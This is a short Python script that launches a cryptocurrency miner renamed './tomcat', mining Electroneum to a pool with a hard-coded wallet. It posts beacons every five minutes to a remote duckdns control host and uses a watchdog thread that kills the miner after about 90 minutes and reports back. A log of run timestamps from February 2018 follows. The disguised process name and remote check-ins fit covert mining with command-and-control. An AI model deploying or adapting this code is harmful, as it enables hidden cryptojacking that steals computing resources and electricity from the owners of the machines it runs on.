import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:07.497870
#2018-02-17 17:36:06.071543
#2018-02-17 19:24:05.599521
#2018-02-17 21:13:05.258108
#2018-02-17 22:57:03.248601
#2018-02-18 00:42:04.292265
#2018-02-18 02:31:03.935458
#2018-02-18 04:18:05.383397
#2018-02-18 06:09:05.913021
#2018-02-18 07:58:01.996348
#2018-02-18 09:46:05.108199
#2018-02-18 11:32:07.576684
#2018-02-18 13:17:04.875440
#2018-02-18 15:07:03.794726
#2018-02-18 16:54:05.238157
#2018-02-18 18:43:01.892325
#2018-02-18 20:29:04.851493
#2018-02-18 22:15:01.556122
#2018-02-19 00:04:06.147485
#2018-02-19 01:49:05.461578
#2018-02-19 03:37:05.602600
#2018-02-19 05:22:03.584417
#2018-02-19 07:08:07.662229
#2018-02-19 08:57:02.064436
#2018-02-19 10:45:09.233831
#2018-02-19 12:34:08.042988
#2018-02-19 14:23:07.692331
#2018-02-19 16:11:10.621995
#2018-02-19 17:59:04.953632
#2018-02-19 19:47:05.984644
#2018-02-19 21:35:01.562316
#2018-02-19 23:21:06.049738
#2018-02-20 01:07:06.777057
#2018-02-20 02:57:03.910941
#2018-02-20 04:44:02.012247
#2018-02-20 06:28:06.971831
#2018-02-20 08:13:01.576865
#2018-02-20 09:58:05.479304
#2018-02-20 11:42:04.688018
#2018-02-20 13:29:02.090841
#2018-02-20 15:13:06.985957
#2018-02-20 16:57:05.962362
#2018-02-20 18:46:05.012920
#2018-02-20 20:37:01.260353
#2018-02-20 22:21:06.680407
#2018-02-21 00:56:07.883917
#2018-02-21 02:42:05.260922
#2018-02-21 04:29:06.892457
#2018-02-21 06:16:08.011608
#2018-02-21 08:02:04.478254
#2018-02-21 09:47:07.564918
#2018-02-21 11:36:05.837638
#2018-02-21 13:26:07.476858
#2018-02-21 15:12:01.997030
#2018-02-21 17:02:04.706285
#2018-02-21 18:51:04.839564
#2018-02-21 20:42:08.332795
#2018-02-21 22:28:01.416301
#2018-02-22 00:17:07.793075
#2018-02-22 02:04:06.383750
#2018-02-22 03:50:07.345478
#2018-02-22 05:37:04.346888
#2018-02-22 07:22:03.444979
#2018-02-22 09:10:07.812377
#2018-02-22 10:58:08.114326
#2018-02-22 12:45:03.712318
#2018-02-22 14:30:10.283634
#2018-02-22 16:17:07.853109
#2018-02-22 18:04:04.764092
#2018-02-22 19:52:07.005401
#2018-02-22 21:42:08.787484
#2018-02-22 23:29:06.811210
#2018-02-23 01:18:01.565727
#2018-02-23 03:04:09.634519
#2018-02-23 04:52:04.840798
#2018-02-23 06:38:06.113482
#2018-02-23 08:28:05.357481
#2018-02-23 10:42:08.988773
#2018-02-23 12:37:04.797508
#2018-02-23 14:22:01.689090
#2018-02-23 16:12:01.267459
#2018-02-23 17:58:01.800822
#2018-02-23 19:43:06.236303
#2018-02-23 21:27:05.761207
#2018-02-23 23:14:06.673220
#2018-02-24 01:04:06.574047
#2018-02-24 02:56:05.285093
#2018-02-24 04:44:02.003486
#2018-02-24 06:31:05.145580
#2018-02-24 08:19:01.607578
#2018-02-24 10:03:06.952342
#2018-02-24 12:01:07.561856
#2018-02-24 13:49:05.056320
#2018-02-24 15:43:04.101066
#2018-02-24 17:36:04.825318
#2018-02-24 19:22:06.104676
#2018-02-24 21:13:04.067083
#2018-02-24 23:47:04.742282
#2018-02-25 03:48:06.680796
#2018-02-25 07:33:04.710047